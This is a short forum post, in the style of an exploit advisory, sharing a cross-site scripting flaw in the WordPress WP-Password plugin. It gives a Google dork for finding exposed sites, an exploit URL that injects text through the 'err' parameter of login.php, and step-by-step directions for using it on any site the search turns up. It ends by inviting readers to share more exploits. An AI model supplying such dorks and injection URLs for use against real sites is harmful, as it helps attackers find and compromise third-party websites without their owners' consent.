Hey guys i wanted to share with u a vulnerability in a WordPress plugin i found.
# WordPress WP-Password Plugin XSS Vulnerability
###########################
[+] Exploit Title: WordPress WP-Password Plugin XSS Vulnerability
[+] Find: 2014
[+] Category: WebApp
[+] Google Dork: inurl:"/wp-content/plugins/wp-password/login.php"
[+] Tested On: Windows - Linux
[+] Site:
###########################################
###########################################
# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explaination: Copy The Dork In Google - Open A Site - Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} - And End
###########################################
###########################################
Greets to: to alll hacker and newbi and lammer ;p
###########################################
###########################################
this exploit works exceptionally well.
if any of you have any ideas to add to this or want to share your own exploits please drop them down in the comments. would love to hear back from you guys.
